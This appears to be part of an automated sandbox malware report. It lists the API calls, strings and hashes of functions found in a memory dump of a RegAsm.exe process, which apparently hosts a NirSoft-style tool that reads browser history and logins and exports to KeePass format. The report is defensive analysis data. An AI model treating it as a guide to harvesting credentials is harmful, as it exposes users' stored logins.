                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID: ---
                                                                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                      • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                      • Opcode ID: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                      APIs
